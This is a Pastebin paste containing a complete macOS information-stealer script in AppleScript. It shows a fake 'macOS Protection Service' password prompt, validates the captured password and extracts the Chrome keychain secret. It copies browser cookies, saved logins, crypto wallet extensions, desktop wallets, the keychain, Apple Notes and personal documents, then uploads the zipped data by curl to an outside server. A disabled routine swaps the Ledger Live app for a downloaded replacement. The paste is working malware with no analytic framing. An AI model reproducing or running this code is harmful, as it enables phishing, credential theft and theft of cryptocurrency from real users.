API tools faq
paste
Guest User

gamma.metricsaggregator.to/strix/index.php

a guest
Nov 4th, 2025
299
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.21 KB | None | 0 0
raw download clone embed print report
  1. osascript -e 'on mkdir(someItem)
  2. try
  3. set filePosixPath to quoted form of (POSIX path of someItem)
  4. do shell script "mkdir -p " & filePosixPath
  5. end try
  6. end mkdir
  7.  
  8. on readfile(pather)
  9. try
  10. set theFile to POSIX file pather
  11. set fileContents to read theFile
  12. return fileContents
  13. end try
  14. return ""
  15. end readfile
  16.  
  17. on FileName(filePath)
  18. try
  19. set reversedPath to (reverse of every character of filePath) as string
  20. set trimmedPath to text 1 thru ((offset of "/" in reversedPath) - 1) of reversedPath
  21. set finalPath to (reverse of every character of trimmedPath) as string
  22. return finalPath
  23. end try
  24. return ""
  25. end FileName
  26.  
  27. on Directory(filePath)
  28. try
  29. set lastSlash to offset of "/" in (reverse of every character of filePath) as string
  30. set trimmedPath to text 1 thru -(lastSlash + 1) of filePath
  31. return trimmedPath
  32. end try
  33. return ""
  34. end Directory
  35.  
  36. on writeText(textToWrite, filePath)
  37. try
  38. set folderPath to Directory(filePath)
  39. mkdir(folderPath)
  40. set fileRef to (open for access filePath with write permission)
  41. set eof of fileRef to 0
  42. write textToWrite to fileRef starting at eof
  43. close access fileRef
  44. end try
  45. end writeText
  46.  
  47. on readwrite(path_to_file, path_as_save)
  48. try
  49. set fileContent to read path_to_file
  50. set folderPath to Directory(path_as_save)
  51. mkdir(folderPath)
  52. do shell script "cat " & quoted form of path_to_file & " > " & quoted form of path_as_save
  53. end try
  54. end readwrite
  55.  
  56. on isDir(someItem)
  57. try
  58. set filePosixPath to quoted form of (POSIX path of someItem)
  59. set fileType to (do shell script "file -b " & filePosixPath)
  60. if fileType ends with "directory" then
  61. return true
  62. end if
  63. end try
  64. return false
  65. end isDir
  66.  
  67. on GrabFolder(sourceFolder, destinationFolder)
  68. try
  69. set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews", "GPUCache", "DawnCache", "Crashpad", "DawnWebGPUCache", "DawnGraphiteCache", "__update__", "tor"}
  70. set fileList to list folder sourceFolder without invisibles
  71. mkdir(destinationFolder)
  72. repeat with currentItem in fileList
  73. if currentItem is not in exceptionsList then
  74. set itemPath to sourceFolder & "/" & currentItem
  75. set savePath to destinationFolder & "/" & currentItem
  76. if isDir(itemPath) then
  77. GrabFolder(itemPath, savePath)
  78. else
  79. readwrite(itemPath, savePath)
  80. end if
  81. end if
  82. end repeat
  83. end try
  84. end GrabFolder
  85.  
  86. on GetUUID(pather, searchString)
  87. try
  88. set theFile to POSIX file pather
  89. set fileContents to read theFile
  90. set startPos to offset of searchString in fileContents
  91. if startPos is 0 then
  92. return "not found"
  93. end if
  94. set uuidStart to startPos + (length of searchString)
  95. set rawuuid to text uuidStart thru (uuidStart + 55) of fileContents
  96. set endpos to offset of "\\" in rawuuid
  97. if endpos is 0 then
  98. return "not found"
  99. end if
  100. set realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContents
  101. return realuuid
  102. on error
  103. return "not found"
  104. end try
  105. end GetUUID
  106.  
  107. on firewallets(firepath, savePath)
  108. try
  109. set fire_wallets to {{"MetaMask", "[email protected]\\\":\\\""}, {"BNB_Chain_Wallet", "0a395005-c941-4030-83c9-018ee43e3414}\\\":\\\""}}
  110. repeat with fire_wallet in fire_wallets
  111. set uuid to GetUUID(firepath & "/prefs.js", item 2 of fire_wallet)
  112. if uuid is not "not found" then
  113. set walkpath to firepath & "/storage/default/"
  114. set fileList to list folder walkpath without invisibles
  115. repeat with currentItem in fileList
  116. if (currentItem contains uuid) and (currentItem contains "userContext") then
  117. set fwallet to walkpath & currentItem & "/idb/"
  118. set walletFiles to list folder fwallet without invisibles
  119. repeat with currentWallet in walletFiles
  120. if isDir(fwallet & currentWallet) then
  121. GrabFolder(fwallet & currentWallet, savePath & "/" & item 1 of fire_wallet & "/")
  122. end if
  123. end repeat
  124. end if
  125. end repeat
  126. end if
  127. end repeat
  128. end try
  129. end firewallets
  130.  
  131. on parseFF(browsername, firefox, writemind)
  132. try
  133. set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
  134. set fileList to list folder firefox without invisibles
  135. repeat with currentItem in fileList
  136. set brPrName to browsername & "_" & currentItem
  137. set savePath to writemind & "Brs/" & brPrName
  138. set extSavePath to writemind & "Exts/" & brPrName
  139. firewallets(firefox & currentItem, extSavePath)
  140. set readpath to firefox & currentItem
  141. repeat with FFile in myFiles
  142. readwrite(readpath & FFile, savePath & FFile)
  143. end repeat
  144. end repeat
  145. end try
  146. end parseFF
  147.  
  148. on checkvalid(username, password_entered)
  149. try
  150. set result to do shell script "dscl . authonly " & quoted form of username & space & quoted form of password_entered
  151. if result is not equal to "" then
  152. return false
  153. else
  154. return true
  155. end if
  156. on error
  157. return false
  158. end try
  159. end checkvalid
  160.  
  161. on getpwd(username, writemind)
  162. try
  163. if checkvalid(username, "") then
  164. set result to do shell script "security 2>&1 > /dev/null find-generic-password -ga \"Chrome\" | awk \"{print $2}\""
  165. writeText(result as string, writemind & "masterpass-chrome")
  166. else
  167. repeat
  168. set result to display dialog "In order to process action required. Input device password to authorize your access:" default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "macOS Protection Service" with hidden answer
  169. set password_entered to text returned of result
  170. if checkvalid(username, password_entered) then
  171. return password_entered
  172. end if
  173. end repeat
  174. end if
  175. end try
  176. return ""
  177. end getpwd
  178.  
  179. on grabPlugins(paths, savePath, pluginList, index)
  180. try
  181. set fileList to list folder paths without invisibles
  182. repeat with PFile in fileList
  183. repeat with currentPlugin in pluginList
  184. if (PFile contains currentPlugin) then
  185. set newpath to paths & PFile
  186. set newsavepath to savePath & "/" & currentPlugin
  187. if index then
  188. set newsavepath to newsavepath & "/IndexedDB/"
  189. end if
  190. GrabFolder(newpath, newsavepath)
  191. end if
  192. end repeat
  193. end repeat
  194. end try
  195. end grabPlugins
  196.  
  197. on chromium(writemind, chromium_map)
  198. set pluginList to {"ldinpeekobnhjjdofggfgjlcehhmanlj", "nphplpgoakhhjchkkhmiggakijnkhfnd", "jbkgjmpfammbgejcpedggoefddacbdia", "fccgmnglbhajioalokbcidhcaikhlcpm", "nebnhfamliijlghikdgcigoebonmoibm", "fdcnegogpncmfejlfnffnofpngdiejii", "mfhbebgoclkghebffdldpobeajmbecfk", "ffbceckpkpbcmgiaehlloocglmijnpmp", "kfdniefadaanbjodldohaedphafoffoh", "bedogdpgdnifilpgeianmmdabklhfkcn", "kpfchfdkjhcoekhdldggegebfakaaiog", "klnaejjgbibmhlephnhpmaofohgkpgkd", "opcgpfmipidbgpenhmajoajpbobppdil", "mmmjbcfofconkannjonfmjjajpllddbg", "modjfdjcodmehnpccdjngmdfajggaoeh", "dkdedlpgdmmkkfjabffeganieamfklkm", "ifclboecfhkjbpmhgehodcjpciihhmif", "ppbibelpcjmhbdihakflkdcoccbgbkpo", "ejjladinnckdgjemekebdpeokbikhfci", "kkpllkodjeloidieedojogacfhpaihoh", "apnehcjmnengpnmccpaibjmhhoadaico", "jiepnaheligkibgcjgjepjfppgbcghmp", "jojhfeoedkpkglbfimdfabpdfjaoolaf", "idpdilbfamoopcfofbipefhmmnflljfi", "lbjapbcmmceacocpimbpbidpgmlmoaao", "oiohdnannmknmdlddkdejbmplhbdcbee", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "fpkhgmpbidmiogeglndfbkegfdlnajnf", "lgmpcpglpngdoalbgeoldeajfclnhafa", "ilhaljfiglknggcoegeknjghdgampffk", "pfccjkejcgoppjnllalolplgogenfojk", "cnmamaachppnkjgnildpdmkaakejnhae", "eajafomhmkipbjmfmhebemolkcicgfmd", "emeeapjkbcbpbpgaagfchmcgglmebnen", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "hifafgmccdpekplomjjkcfgodnhcellj", "ffnbelfdoeiohenkjibnmadjiehjhajb", "fnjhmkhhmkbjkkabndcnnogagogbneec", "bcopgchhojmggmffilplmbdicgaihlkp", "cmoakldedjfnjofgbbfenefcagmedlga", "ifckdpamphokdglkkdomedpdegcjhjdp", "ibljocddagjghmlpgihahamcghfggcjc", "cjmkndjhnagcfbpiemnkdpomccnjblmj", "kbdcddcmgoplfockflacnnefaehaiocb", "cgeeodpfagjceefieflmdfphplkenlfk", "afbcbjpbpfadlkmhmclhkeeodmamcflc", "fdchdcpieegfofnofhgdombfckhbcokj", "gjlmehlldlphhljhpnlddaodbjjcchai", "ellkdbaphhldpeajbepobaecooaoafpg", "ojbcfhjmpigfobfclfflafhblgemeidi", "ghlmndacnhlaekppcllcpcjjjomjkjpg", "kgdijkcfiglijhaglibaidbipiejjfdp", "abkahkcbhngaebpcgfmhkoioedceoigp", "ammjlinfekkoockogfhdkgcohjlbhmff", "pdliaogehgdbhbnmkklieghmmjkpigpa", "jnlgamecbpmbajjfhmmmlhejkemejdma", "nbdhibgjnjpnkajaghbffjbkcgljfgdi", "jfdlamikmbghhapbgfoogdffldioobgl", "fijngjgcjhjmmpcmkeiomlglpeiijkld", "hgbeiipamcgbdjhfflifkgehomnmglgk", "pmmnimefaichbcnbndcfpaagbepnjaig", "cflgahhmjlmnjbikhakapcfkpbcmllam", "keenhcnmdmjjhincpilijphpiohdppno", "bipdhagncpgaccgdbddmbpcabgjikfkn", "bcenedbpaaegpnijoadpdjiachahncdg", "pocmplpaccanhmnllbbkpgfliimjljgo", "klghhnkeealcohjjanjjdaeeggmfmlpl", "cjookpbkjnpkmknedggeecikaponcalb", "ojggmchlghnjlapmfbnjholfjkiidbch", "dngmlblcodfobpdpecaadgfbcggfjfnm", "jnldfbidonfeldmalbflbmlebbipcnle", "ehjiblpccbknkgimiflboggcffmpphhp", "agoakfejjabomempkjlepdflaleeobhb", "fopmedgnkfpebgllppeddmmochcookhc", "dmkamcknogkgcdfhhbddcghachkejeap", "iglbgmakmggfkoidiagnhknlndljlolb", "opfgelmcmbiajamepnmloijbpoleiama", "gkeelndblnomfmjnophbhfhcjbcnemka", "dgiehkgfknklegdhekgeabnhgfjhbajd", "gafhhkghbfjjkeiendhlofajokpaflmk", "imlcamfeniaidioeflifonfjeeppblda", "penjlddjkjgpnkllboccdgccekpkcbin", "nhnkbkgjikgcigadomkphalanndcapjk", "egjidjbpglichdcondbcbdnbeeppgdph", "dlcobpjiigpikoobohmabehhmhfoodbb", "dldjpboieedgcmpkchcjcbijingjcgok", "acmacodkjbdgmoleebolmdjonilkdbch", "lccbohhgfkdikahanoclbdmaolidjdfl", "pcndjhkinnkaohffealmlmhaepkpmgkb", "gjagmgiddbbciopjhllkdnddhcglnemk", "cnncmdhjacpkmjmkcafchppbnpnhdmon", "mfgccjchihfkkindfppnaooecgfneiii", "ieldiilncjhfkalnemgjbffmpomcaigi", "ckklhkaabbmdjkahiaaplikpdddkenic", "loinekcabhlmhjjbocijdoimmejangoa", "mgffkfbidihjpoaomajlbgchddlicgpn", "pnndplcbkakcplkjnolgbkdgjikjednm", "mcohilncbfahbmgdjkbpemcciiolgcge", "bgpipimickeadkjlklgciifhnalhdjhe", "pdadjkfkgcafgbceimcpbkalnfnepbnk", "jiidiaalihmmhddjgbnbgdfflelocpak", "aeachknmefphepccionboohckonoeemg", "gdokollfhmnbfckbobkdbakhilldkhcj", "jiiigigdinhhgjflhljdkcelcjfmplnd", "kmphdnilpmdejikjdnlbcnmnabepfgkh", "jaooiolkmfcmloonphpiiogkfckgciom", "fcckkdbjnoikooededlapcalpionmalo", "mdnaglckomeedfbogeajfajofmfgpoae", "ebfidpplhabeedpnhjnobghokpiioolj", "dbgnhckhnppddckangcjbkjnlddbjkna", "cpmkedoipcpimgecpmgpldfpohjplkpp", "epapihdplajcdnnkdeiahlgigofloibg", "iokeahhehimjnekafflcihljlcjccdbe", "cihmoadaighcejopammfbmddcmdekcje", "hnfanknocfeofbddgcijnmhnfnkdnaad", "kilnpioakcdndlodeeceffgjdpojajlo", "abogmiocnneedmmepnohnhlijcjpcifd", "bofddndhbegljegmpmnlbhcejofmjgbn", "aholpfdialjgjfhomihkjbmgjidlcdno", "hdkobeeifhdplocklknbnejdelgagbao", "oafedfoadhdjjcipmcbecikgokpaphjk", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "nkbihfbeogaeaoehlefnkodbefgpgknn", "lfmmjkfllhmfmkcobchabopkcefjkoip", "aiifbnbfobpmeekipheeijimdpnlpgpp", "anokgmphncpekkhclmingpimjmcooifb", "mnfifefkajgofkcjkemidiaecocnkjeh", "momakdpclmaphlamgjcndbgfckjfpemp", "akkmagafhjjjjclaejjomkeccmjhdkpa", "ehgjhhccekdedpbkifaojjaefeohnoea", "mkpegjkblkkefacfnmkajcjmabijhclg", "mlhakagmgkmonhdonhkpjeebfphligng", "niiaamnmgebpeejeemoifgdndgeaekhe", "jnmbobjmhlngoefaiojfljckilhhlhcj", "onhogfjeacnfoofkfgppdlbmlmnplgbn", "kppfdiipphfccemcignhifpjkapfbihd", "hcjhpkgbmechpabifbggldplacolbkoh", "flpiciilemghbmfalicajoolhkkenfel", "mlbnicldlpdimbjdcncnklfempedeipj", "cfbfdhimifdmdehjmkdobpcjfefblkjm", "ocjobpilfplciaddcbafabcegbilnbnb", "pgiaagfkgcbnmiiolekcfmljdagdhlcm", "enabgbdfcbaehmbigakijjabdpdnimlg", "bifidjkcdpgfnlbcjpdkdcnbiooooblg", "lnnnmfcpbkafcpgdilckhmhbkkbpkmid", "nlgbhdfgdhgbiamfdfmbikcdghidoadd", "fcfcfllfndlomdhbehjjcoimbgofdncg", "lpilbniiabackdjcionkobglmddfbcjo", "efbglgofoippbgcjepnhiblaibcnclgk", "fhbohimaelbohpjbbldcngcnapndodjp", "gkodhkbmiflnmkipcmlhhgadebbeijhh", "bocpokimicclpaiekenaeelehdjllofo", "bhhhlbepdkbapadjdnnojkbgioiodbic", "aflkmfhebedbjioipglgcbcmnbpgliof", "mkchoaaiifodcflmbaphdgeidocajadp", "mapbhaebnddapnmifbbkgeedkeplgjmf", "lmkncnlpeipongihbffpljgehamdebgi", "gjnckgkfmgmibbkoficdidcljeaaaheg", "ppdadbejkmjnefldpcdjhnkpbjkikoip", "bopcbmipnjdcdfflfgjdgdjejmgpoaab", "kamfleanhcmjelnhaeljonilnmjpkcjc", "cphhlgmgameodnhkjdmkpanlelnlohao", "hnhobjmcibchnmglfbldbfabcgaknlkj", "nknhiehlklippafakaeklbeglecifhad", "kjjebdkfeagdoogagbhepmbimaphnfln", "phkbamefinggmakgklpkljjmgibohnba", "lakggbcodlaclcbbbepmkpdhbcomcgkd", "ookjlbkiijinhpmnjffcofjonbfbgaoc", "mdjmfdffdcmnoblignmgpommbefadffd", "jblndlipeogpafnldhgmapagcccfchpi", "hbbgbephgojikajhfbomhlmmollphcad", "dpcklmdombjcplafheapiblogdlgjjlb", "hmeobnfnfcmdkdcmlblgagmfpfboieaf", "kmhcihpebfmpgmihbkipmjlmmioameka", "kennjipeijpeengjlogfdjkiiadhbmjl", "amkmjjmmflddogmhpjloimipbofnfjih", "idnnbdplmphpflfnlkomgpfbpcgelopg", "fmblappgoiilbgafhjklehhfifbdocee", "heamnjbnflcikcggoiplibfommfbkjpj", "khpkpbbcccdmmclmpigdgddabeilkdpd", "omaabbefbmiijedngplfjmnooppbclkk", "nhlnehondigmgckngjomcpcefcdplmgc", "fiikommddbeccaoicoejoniammnalkfa", "ejbidfepgijlcgahbmbckmnaljagjoll", "glmhbknppefdmpemdmjnjlinpbclokhn", "kncchdigobghenbbaddojjnnaogfppfj", "hpclkefagolihohboafpheddmmgdffjm", "ilolmnhjbbggkmopnemiphomhaojndmb", "panpgppehdchfphcigocleabcmcgfoca", "nngceckbapebfimnlniiiahkandclblb", "hdokiejnpimakedhajhdlcegeplioahd", "eiaeiblijfjekdanodkjadfinkhbfgcd", "bfogiafebfohielmmehodmfbbebbbpei", "pnlccmojcmeohlpggmfnbbiapkmbliob", "aeblfdkhhhdcdjpifhhbdiojplfjncoa", "kmcfomidfpdkfieipokbalgegidffkal", "fdjamakpfbbddfjaooikfcpapjohcfmg", "ghmbeldphafepmbegfdlkpapadhbakde", "cnlhokffphohmfcddnibpohmkdfafdli", "khhapgacijodhjokkcjmleaempmchlem", "admmjipmmciaobhojoghlmleefbicajg", "caljgklbbfbcjjanaijlacgncafpegll"}
  199. set indexedPlugins to {"hnfanknocfeofbddgcijnmhnfnkdnaad", "mcohilncbfahbmgdjkbpemcciiolgcge", "aflkmfhebedbjioipglgcbcmnbpgliof", "enabgbdfcbaehmbigakijjabdpdnimlg", "cpmkedoipcpimgecpmgpldfpohjplkpp", "hdokiejnpimakedhajhdlcegeplioahd", "eiaeiblijfjekdanodkjadfinkhbfgcd", "cnlhokffphohmfcddnibpohmkdfafdli", "khhapgacijodhjokkcjmleaempmchlem", "hifafgmccdpekplomjjkcfgodnhcellj"}
  200. set chromiumFiles to {"/Network/Cookies", "/Cookies", "/Web Data", "/Login Data", "/Local Extension Settings/", "/IndexedDB/"}
  201. repeat with chromiumBrowser in chromium_map
  202. set brPrName to item 1 of chromiumBrowser & "_"
  203. set savePath to writemind & "Brs/" & brPrName
  204. set extSavePath to writemind & "Exts/" & brPrName
  205.  
  206. try
  207. set fileList to list folder item 2 of chromiumBrowser without invisibles
  208. repeat with currentItem in fileList
  209. if ((currentItem as string) is equal to "Default") or ((currentItem as string) contains "Profile") then
  210. repeat with CFile in chromiumFiles
  211. set readpath to (item 2 of chromiumBrowser & currentItem & CFile)
  212. if ((CFile as string) is equal to "/Network/Cookies") then
  213. set CFile to "/Cookies"
  214. end if
  215. if ((CFile as string) is equal to "/Local Extension Settings/") then
  216. grabPlugins(readpath, extSavePath & currentItem, pluginList, false)
  217. else if (CFile as string) is equal to "/IndexedDB/" then
  218. grabPlugins(readpath, extSavePath & currentItem, indexedPlugins, true)
  219. else
  220. set writepath to savePath & currentItem & CFile
  221. readwrite(readpath, writepath)
  222. end if
  223. end repeat
  224. end if
  225. end repeat
  226. end try
  227. end repeat
  228. end chromium
  229.  
  230. on filegrabber(writemind)
  231. try
  232. set destFolder to writemind & "Files/"
  233. set ntsP to writemind & "Notes/"
  234. set destinationFolderPath to POSIX file destFolder
  235. set ntsPDF to POSIX file ntsP
  236. set notesMediaFolder to POSIX file (ntsP & "Media/")
  237. set extensionsList to {"txt", "pdf", "docx", "wallet", "key", "keys", "doc", "jpeg", "png", "kdbx", "rtf", "jpg"}
  238. set bankSize to 0
  239. set notesBankSize to 0
  240. set uuidString to do shell script "system_profiler SPHardwareDataType | awk \"/UUID/ { print $3 }\""
  241. mkdir(destinationFolderPath)
  242. mkdir(notesMediaFolder)
  243. tell application "Finder"
  244. try
  245. set safariFolderPath to (path to home folder as text) & "Library:Cookies:"
  246. duplicate file (safariFolderPath & "Cookies.binarycookies") to folder destinationFolderPath with replacing
  247. set name of result to "saf1"
  248. end try
  249. set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
  250. try
  251. duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
  252. end try
  253. set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
  254. set notesFolder to folder notesFolderPath
  255. set notesFiles to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
  256. repeat with aFile in notesFiles
  257. try
  258. duplicate (file aFile of notesFolder) to folder ntsPDF with replacing
  259. end try
  260. end repeat
  261. set notesAccountsPath to (notesFolderPath & "Accounts:")
  262. try
  263. set notesAccountsFolder to folder notesAccountsPath
  264. set notesAccountsFiles to every folder of notesAccountsFolder
  265. repeat with nFile in notesAccountsFiles
  266. set notesMediaPath to notesAccountsPath & name of nFile & ":Media:"
  267. set notesMediaAllProfiles to every folder of (folder notesMediaPath)
  268. repeat with profileFolder in notesMediaAllProfiles
  269. set notesMediaProfilesPath to notesMediaPath & name of profileFolder
  270. set notesMediaProfileFiles to every folder of (folder notesMediaProfilesPath)
  271. repeat with notesUUID in notesMediaProfileFiles
  272. set noteIdFiles to every file of notesUUID
  273. repeat with notesIdFile in noteIdFiles
  274. try
  275. set fileSize to size of notesIdFile as text
  276. set notesBankSize to notesBankSize + fileSize
  277. if notesBankSize < 12 * 1024 * 1024 then
  278. duplicate notesIdFile to notesMediaFolder with replacing
  279. else
  280. exit repeat
  281. end if
  282. end try
  283. end repeat
  284. end repeat
  285. end repeat
  286. end repeat
  287. end try
  288. try
  289. set safariFolderPath to (path to library folder from user domain as text) & "Safari:"
  290. duplicate (file "Form Values" of folder safariFolderPath) to destinationFolderPath with replacing
  291. end try
  292. try
  293. set keychainFolder to (path to library folder from user domain as text) & "Keychains:" & uuidString
  294. duplicate folder keychainFolder to destinationFolderPath with replacing
  295. end try
  296. try
  297. set desktopFiles to every file of desktop
  298. set documentsFiles to every file of folder "Documents" of (path to home folder)
  299. repeat with aFile in (desktopFiles & documentsFiles)
  300. set fileExtension to name extension of aFile
  301. if fileExtension is in extensionsList then
  302. set fileSize to size of aFile
  303. if (bankSize + fileSize) < 10 * 1024 * 1024 then
  304. try
  305. duplicate aFile to folder destinationFolderPath with replacing
  306. set bankSize to bankSize + fileSize
  307. end try
  308. else
  309. exit repeat
  310. end if
  311. end if
  312. end repeat
  313. end try
  314. end tell
  315. end try
  316. end filegrabber
  317.  
  318. on send_data(attempt, outUsername, serverIP, isBot)
  319. try
  320. set result_send to (do shell script "curl -X POST -H \"X-Bid: " & "f48fbe39836779cadbf148b5952919fd" & "\" -F \"lil-arch=@/tmp/salmonela.zip\" https://metricsaggregator.to/api/data/receive")
  321. on error
  322. if attempt < 10 then
  323. delay 60
  324. send_data(attempt + 1, outUsername, serverIP)
  325. end if
  326. end try
  327. end send_data
  328.  
  329. on snd_rn(attempt)
  330. try
  331. set result_send to (do shell script "curl -X POST -H \"X-Bid: f48fbe39836779cadbf148b5952919fd\" https://metricsaggregator.to/api/health")
  332. on error
  333. if attempt < 2 then
  334. delay 10
  335. snd_rn(attempt + 1, outUsername, serverIP)
  336. end if
  337. end try
  338. end snd_rn
  339.  
  340. on toast(sampleVal, anotherVal, thirdVal, fourthVal, fifthVal)
  341. set downloadURL to ""
  342.  
  343. set appName to "" & anotherVal & ".app"
  344. set appPath to "/Applications/" & appName
  345. set tempDir to "/tmp/"
  346. set zipFile to tempDir & fourthVal & ".zip"
  347. set extractDir to tempDir & fifthVal
  348.  
  349. try
  350. do shell script "curl -L -o '" & POSIX path of zipFile & "' '" & thirdVal & "'"
  351. try
  352. do shell script "pkill -9 '" & appName & "'"
  353. end try
  354.  
  355. delay 1
  356.  
  357. do shell script "mkdir -p '" & POSIX path of extractDir & "'"
  358. do shell script "unzip -q '" & POSIX path of zipFile & "' -d '" & POSIX path of extractDir & "'"
  359. do shell script "rm -r '" & POSIX path of extractDir & "/__MACOSX/" & "'"
  360.  
  361. set findAppResult to do shell script "find '" & POSIX path of extractDir & "' -maxdepth 2 -name '*.app' -type d | head -1"
  362. set newAppPath to findAppResult
  363.  
  364. if newAppPath is "" then
  365. do shell script "rm -rf '" & POSIX path of extractDir & "'"
  366. do shell script "rm -f '" & POSIX path of zipFile & "'"
  367. return
  368. end if
  369.  
  370. do shell script "echo \"" & sampleVal & "\" | sudo -S rm -rf '" & POSIX path of appPath & "'"
  371.  
  372. delay 1
  373.  
  374. do shell script "echo \"" & sampleVal & "\" | sudo -S cp -r '" & newAppPath & "' '" & POSIX path of appPath & "'"
  375.  
  376. do shell script "rm -rf '" & POSIX path of extractDir & "'"
  377. do shell script "rm -f '" & POSIX path of zipFile & "'"
  378. end try
  379. end toast
  380.  
  381. on main()
  382. snd_rn(0)
  383. set username to (system attribute "USER")
  384. set outUsername to "a"
  385. set serverIP to "localhost"
  386. set isBot to ""
  387. set systemProfile to "/Users/" & username
  388. writeText(outUsername, systemProfile & "/.username")
  389. set writemind to "/tmp/salmonela/"
  390. try
  391. set result_userinfo to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
  392. writeText(result_userinfo, writemind & "hardware")
  393. end try
  394. set rawlib to systemProfile & "/Library/"
  395. set library to rawlib & "Application Support/"
  396. set password_entered to readfile(systemProfile & "/.pwd")
  397. if not checkvalid(username, password_entered) then
  398. set password_entered to getpwd(username, writemind)
  399. writeText(password_entered, systemProfile & "/.pwd")
  400. end if
  401. delay 0.01
  402. writeText(password_entered, writemind & "ggwp")
  403. try
  404. readwrite(rawlib & "Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies", writemind & "Files/Cookies.binarycookies")
  405. end try
  406. try
  407. readwrite(rawlib & "Cookies/Cookies.binarycookies", writemind & "Files/saf1")
  408. end try
  409. try
  410. filegrabber(writemind)
  411. end try
  412. set chromiumMap to {{"chr", library & "Google/Chrome/"}, {"brave", library & "BraveSoftware/Brave-Browser/"}, {"edge", library & "Microsoft Edge/"}, {"viva", library & "Vivaldi/"}, {"op", library & "com.operasoftware.Opera/"}, {"opgx", library & "com.operasoftware.OperaGX/"}, {"chr_b", library & "Google/Chrome Beta/"}, {"chr_c", library & "Google/Chrome Canary"}, {"chrm", library & "Chromium/"}, {"chr_dev", library & "Google/Chrome Dev/"}, {"arc", library & "Arc/User Data/"}}
  413. set walletMap to {{"Electrum", systemProfile & "/.electrum/wallets/"}, {"Coinomi", library & "Coinomi/wallets/"}, {"Exodus", library & "Exodus/"}, {"Atomic", library & "atomic/Local Storage/leveldb/"}, {"Wasabi", systemProfile & "/.walletwasabi/client/Wallets/"}, {"Ledger_Live", library & "Ledger Live/"}, {"Monero", systemProfile & "/Monero/wallets/"}, {"Bitcoin_Core", library & "Bitcoin/wallets/"}, {"Litecoin_Core", library & "Litecoin/wallets/"}, {"Dash_Core", library & "DashCore/wallets/"}, {"Electrum_LTC", systemProfile & "/.electrum-ltc/wallets/"}, {"Electron_Cash", systemProfile & "/.electron-cash/wallets/"}, {"Guarda", library & "Guarda/"}, {"Dogecoin_Core", library & "Dogecoin/wallets/"}, {"Trezor_Suite", library & "@trezor/suite-desktop/"}}
  414. try
  415. readwrite(library & "Binance/app-store.json", writemind & "deskwallets/Binance/app-store.json")
  416. end try
  417. try
  418. readwrite(library & "@tonkeeper/desktop/config.json", "deskwallets/TonKeeper/config.json")
  419. end try
  420. try
  421. readwrite(rawlib & "Keychains/login.keychain-db", writemind & "Kch/login.keychain-db")
  422. end try
  423. writeText(username, writemind & "user")
  424. set ff_paths to {{"ff", library & "Firefox/Profiles/"}, {"wf", library & "Waterfox/Profiles/"}}
  425.  
  426. repeat with gecko in ff_paths
  427. try
  428. parseFF(item 1 of gecko, item 2 of gecko, writemind)
  429. end try
  430. end repeat
  431.  
  432. repeat with deskWallet in walletMap
  433. try
  434. GrabFolder(item 2 of deskWallet, writemind & "Wlt/" & item 1 of deskWallet)
  435. end try
  436.  
  437. end repeat
  438. try
  439. chromium(writemind, chromiumMap)
  440. end try
  441. do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/salmonela.zip"
  442. send_data(0, outUsername, serverIP, isBot)
  443. do shell script "rm -r " & writemind
  444. do shell script "rm /tmp/salmonela.zip"
  445.  
  446. try
  447. -- toast(password_entered, "Ledger Live", "https://gamma.metricsaggregator.to/7379951eb23e20eac7369c2b91a325d2_b_l.php", "lekkjah", "lekkoisk")
  448. end try
  449. end main
  450.  
  451. main()'
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!